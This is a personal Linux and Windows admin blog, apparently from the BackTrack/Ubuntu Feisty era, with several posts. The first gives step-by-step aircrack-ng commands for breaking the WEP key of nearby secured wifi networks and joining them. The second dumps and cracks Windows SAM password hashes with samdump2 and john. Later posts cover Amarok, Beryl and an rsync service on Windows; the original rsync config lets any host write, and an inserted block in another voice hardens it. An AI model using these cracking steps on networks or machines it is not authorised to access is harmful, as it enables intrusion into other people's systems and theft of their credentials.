Wifi-less no more
For the first time in my life, I found myself without any wireless connectivity I could easily hook up to. I needed internet access, but around me there were only secured wifi access points.
I needed to find the key I lost.
How could I connect without knowing any of those WEP or WPA keys?
I suddenly remembered that I always carry a very handy CD in my laptop bag: BackTrack 2. It is a very convenient live CD that helps you solve a lot of problems, and it also has tools to scan for wifi!
My Ubuntu install did not have any of those tools, so I rebooted and ran this live CD.
First you need to enable the monitor mode on your interface:
#airmon-ng start ath0
Then just run airodump to scan around:
#airodump-ng ath0 out 0
If you get the wifi around you it means you are ready to play.
Once you see an AP with decent signal power (close to you), use aireplay to inject packets:
#aireplay-ng -1 0 -e Target_ID -a MACoftheAP -h Your_MAC ath0
It will send authentication requests and you should eventually get this:
Association successful
This means you are associated with the AP and ready to replay IVs.
You may want to rerun this association every X seconds so you do not lose the AP connection.
This command will reassociate you every 20 seconds:
#aireplay-ng -1 20 -e Target_ID -a MACoftheAP -h Your_MAC ath0
Once associated, send packets as follows. If you are not associated you will see no packets being sent:
#aireplay-ng -3 -b MacoftheAP -h Your_MAC -x 600 ath0
You must also start airodump on the target channel to capture replies, capturing only the IVs to save space:
#airodump-ng -w out --ivs --channel X ath0
aireplay will read:
Read 12345 packets (got 123 ARP requests), sent 12345 packets...
You have to keep sending until you get a lot of IVs (check airodump). If it stops sending, try reassociating with the AP.
Once you have a lot of IVs, you can start running aircrack. Just run it from another console, as it can read the output file as it is updated.
#aircrack-ng -x -0 out.ivs
When you see a "key found" message you are ready to get a network connection.
Just enter:
#iwconfig ath0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX
#dhcpcd ath0
Then a quick ifconfig will confirm you are connected and got an IP from the AP. Voila! I was able to check what I needed and then go away.
A quick and dirty Windows password recovery
Boot the Backtrack CD.
Change dir to your Windows mount point:
# cd /mnt/hda2/WINDOWS/system32/config
Copy the SAM and the system Registry hive to the temp dir:
# cp SAM /tmp
# cp system /tmp
Prepare our wordlist:
# cd /pentest/password/dictionaries/
# gunzip -c wordlist.txt.Z > /tmp/words.txt
# cd /tmp
As the Windows hashes (in the SAM file) are encrypted, we need this key (called bootkey) to decrypt the SAM hashes:
# bkhive system key
Now we can dump the password hashes out of the SAM file:
# samdump2 SAM key > /tmp/hashes.txt
Let's crack those hashes. The easiest way, if the password is in the wordlist, is to use john:
# john -w=words.txt -f=NT hashes.txt
No luck? Let's use the brute force method:
# john --incremental:all -f=NT hashes.txt
If this takes too long you could use ophcrack. This tool uses rainbow tables and should crack your hashes in a few seconds, but you need to download those rainbow tables (350 MB or 700 MB, or you can generate them yourself), which are not included on the BackTrack CD (for an obvious reason...). Or you can use the ophcrack online cracker, which should be quite fast.
Amarok feisty fix
Amarok is a nice media player for your Ubuntu. It leaves your files alone (yeah!) and maintains its own database by watching the directory you tell it to watch.
However, in Ubuntu Amarok has no mp3 support. This does not seem to be installed automatically and needs to be done manually.
No worries, this is easy when you know where to look.
Amarok will freeze when you try to play any mp3 if you do not do this.
First, close any Amarok instance.
Go to /usr/lib/amarok, where you will find an install-mp3 file.
Just run it, and voila! Restart Amarok and there you are.
Oh, I was talking about Amarok 1.4.6 on Feisty.
switched to ubuntu
Yes, I did the jump. Last night I turned my XP SP2 valliant box into an Ubuntu Feisty box. I never really tried the live CD but had read a few things about this distro.
So far I really like it. I have not tried all the things I used to do with my XP SP2. So far I just miss my Densha de Go simulation game, but I still think it might work with Wine.
I wanted to play some Xvid videos I had and BAAAM, the player says there is no codec installed for this, would you like to search and install it? I clicked YES and the video played. It is really pleasant. Really.
Today I want to try Beryl. This video really made me think about it.
Please make sure your card is supported for accelerated graphics. In a terminal type:
glxinfo | grep direct
If you get this output back, your card should work:
Direct rendering: Yes
If you get a "no" from this test, please install the correct driver.
To install the driver, use Feisty's Restricted Drivers Manager to install the graphics card drivers. I like Feisty for that; everything is easy.
Installing Beryl is as easy. Make sure you have the multiverse repository enabled (it's on by default) and install using:
sudo apt-get install beryl beryl-manager emerald-themes
To run Beryl, launch it using the execute window (Alt+F2, then Enter):
beryl-manager
You may want to add Beryl to your start up if you really like it.
Add beryl-manager to the list of startup programs by going to System -> Preferences -> Sessions, then under the Startup Programs tab click New. Enter beryl-manager for both the Name and Command arguments.
Misc: if you're still having issues, visit the Ubuntu Wiki.
Installing RSYNC on Windows 2003/2000/NT.

This document assumes that you want to install rsync as a daemon on a Windows NT/2000/2003 server or XP, without installing the entire cygwin suite.
You will need the following files:
From Cygwin:
- cygpopt-0.dll
- cygwin1.dll
- rsync.exe
These are available from http://www.cygwin.com
A zip file containing the three files you need is available.
From the Windows NT or 2000 Resource Kit (you may also want to read this KB article):
- instsrv.exe
- srvany.exe
For simplicity I have zipped them up in the previously mentioned package.
If you follow the instructions below you will have an rsync service on your Windows machine.
Please be careful where you place the server as any one who can see it can read from this service.
- Place rsync where you want to run it from (I usually use C:\program files\rsync).
- Put the two DLLs anywhere in the path, usually C:\winnt\system32 or c:\windows\system32, but for sure %windir%\system32.
- From a shell running in the directory containing instsrv and srvany, type (replace C:\DirectoryContaining\ as appropriate):
instsrv Rsync "C:\DirectoryContaining\srvany.exe"
- You should now have a new service called Rsync and you can verify by looking in Start->Control Panel->Services (you can also open services.msc from a run command on 2000 or newer)
- DON'T START IT YET!
- If you want to run rsync in daemon mode you will need a configuration file. Here is the one I use; call it rsyncd.conf and place it in the same directory as rsync (C:\Program files\rsync\rsyncd.conf):
use chroot = false
strict modes = false
hosts allow = *
log file = c:/rsyncd.log
[Repl]
path = C:/rsync/
read only = no
(The command line to connect would look something like "rsync -avz server::BackupArea", where server is the name of the server running the rsync daemon.)
The first two lines are important for rsync to work on Windows.
- You are going to need to hack some keys in the registry to make it work. Don't do this unless you are comfortable with the changes! Run regedt32 and add the following keys and values (quotation marks ARE IMPORTANT):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rsync
Edit -> Add Key -> Key Name: Parameters
Edit -> Add Value -> Value Name: AppDirectory, Value: "C:\Program Files\rsync"
Edit -> Add Value -> Value Name: Application, Value: "C:\Program Files\rsync\rsync.exe"
Edit -> Add Value -> Value Name: AppParameters, Value: --config="C:\Program Files\rsync\rsyncd.conf" --daemon --no-detach
If you would like to add these keys automatically, there is a .reg file in the rsync.zip file hosted at the top. Just double click on rsync-param.reg
Rsync server uses port 873 by default. You can update the registry to specify a new port:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsyncServer\Parameters]
"AppArgs"="--config rsyncd.conf --daemon --no-detach --port=new-port-number"
Remember, unless you trust me implicitly, read the reg file and make sure you understand what it's doing before you run it, I will not be held responsible for idiots.
- You will probably have to open up the services control panel and double click on the Rsync service. Open the Log On tab and either change it to logon using the Local System account or edit the account information to a valid login account.
- That's it, you should be able to start and stop the rsync service at will using the Services Control Panel. When running with the above configuration you should be able to test by attempting to telnet to port 873 from a remote machine. telnet rsync.server.com 873 (replacing rsync.server.com with your own server's address and the port) You should get a connection to the rsync daemon running on your server.
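The rsyncd.conf above answers to every host that can reach port 873 and lets them write into the module. As an added example (not the original post's file), here is the same configuration with the module restricted to one backup client, made read-only, and protected by a module login; the client address, user name and secrets file path are assumptions.

```ini
# rsyncd.conf for the Windows rsync service (added example, not the post's own file).
# Every option here is a standard rsyncd.conf(5) option.
use chroot = false
strict modes = false
log file = c:/rsyncd.log

[Repl]
    path = C:/rsync/
    # Original: "hosts allow = *" and "read only = no" (anyone could read and write).
    # Only the backup client (assumed address) may connect; everyone else is refused.
    hosts allow = 192.168.1.20
    hosts deny = *
    # Clients pull data for backup; nothing can be pushed into the share.
    read only = yes
    # Hide the module from "rsync server::" listings.
    list = no
    # Require a module login; the secrets file holds one "user:password" line per user
    # (assumed path; keep the file readable by the service account only).
    auth users = backup
    secrets file = C:/rsync/rsyncd.secrets
```

With this in place the client command becomes "rsync -avz backup@server::Repl destination", and the log file records every refused connection.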
Then you may want to use rsync on another machine to rsync something.
Your rsync command will be in the following format (but not exactly this):
rsync -avz --delete --exclude '.Bad files' '/cygdrive/f/Public/toBakup' rsync://remoteserv:87/Repl
Let's break this command down. Here you're calling rsync using the -a, -v and -z options (archive, verbose and use compression, respectively). It should delete any files that exist on the destination that don't exist on the source (--delete), and it should exclude all files called '.Bad files' (--exclude, because we don't need to back up the annoying little system files). The source is on drive f: (/cygdrive/f/Public/toBakup) and the destination is the module named Repl (see conf file) on the server remotesrv, on port 87.
Once you hit Enter, rsync will spring into action and start transferring the files from the source and mirroring them in the destination directory on your server. The -v switch (verbose) means you'll see all the action as it's happening. Check the rsync man page for more switches.
Like all good command line interaction, the secret sauce which bends rsync to your will lies in the usage switches you provide it in the rsync call (ie, rsync -avz). To see all the available options, type rsync -h at the command line. A few of the more interesting ones are:
- -r, --recursive: recurse into directories
- -u, --update: skip files that are newer on the receiver
- -n, --dry-run: show what would have been transferred
- --existing: only update files that already exist on the receiver
- --delete: delete files that don't exist on the sending side
- -z, --compress: compress file data during the transfer
- --exclude=PATTERN: exclude files matching PATTERN
If you're just getting started with rsync, the -n ("dry run") switch with -v (verbose) is a great way to see what files would get copied without actually performing the copy. Use that switch to test out your rsync recipe before you run it.
It runs well but a few questions remain:
Can it copy files in use?
How to preserve NTFS attributes?
I have found an answer for the first one. The answer is quite simple: use VSS (Volume Shadow Copy). Go to the VSS MS resource site and download the kit. Then you should be able to create volume shadows in no time and copy files in use.
You may also like to read from the guy who wrote VSS:
Link to blog: http://blogs.msdn.com/adioltean
Link to first script: http://blogs.msdn.com/adioltean/archive/2005/01/20/357836.aspx
Link to second script: http://blogs.msdn.com/adioltean/archive/2005/01/05/346793.aspx
Here is an example I found:
SHADOWRSYNC.CMD
setlocal
@REM test if we are called by shadowrsync.cmd
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
@REM
@REM Set these variables to what you need.
@REM SHADOW_DRIVE_LETTER is an existing drive you want to shadow
@REM
@REM MAP_SHADOW_TO needs to be either a drive letter that isn't
@REM currently in use, or an empty directory
@REM eg. x: or c:\temp\shadowcopy
@REM
set SHADOW_DRIVE_LETTER=D:
set MAP_SHADOW_TO=X:
@REM
@REM Create the shadow copy - and generate env variables into a temporary script.
@REM Then recursively come back into this script.
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedTempScript.cmd
@echo ...Create the shadow copy...
vshadow.exe -nw -p -script=%TEMP_GENERATED_SCRIPT% -exec=%CALLBACK_SCRIPT% %SHADOW_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@REM Get the vshadow temp variables.
call %TEMP_GENERATED_SCRIPT%
@REM Map the drive to the shadow copy
vshadow -el=%SHADOW_ID_1%,%MAP_SHADOW_TO%
@REM Now do your rsync thing
rsync blah blah blah blah........
@REM Delete the shadow
vshadow -ds=%SHADOW_ID_1%
I still have to try this, but I am sure it would work, as it works for the backup software I usually use. In some way it looks like we are getting closer to DPM (Microsoft Data Protection Manager), a new MS product that almost continuously syncs some content for user-managed restore or for backup. Maybe I should work on a GNU DPM, eh!
I still have no answer about how to preserve NTFS attributes; since rsync is from the Unix world and the NTFS mechanism is quite complex, I am not sure they are very compatible. If only they were, this would be very useful for restores: just restore the data or switch to another server.
KitKatNeko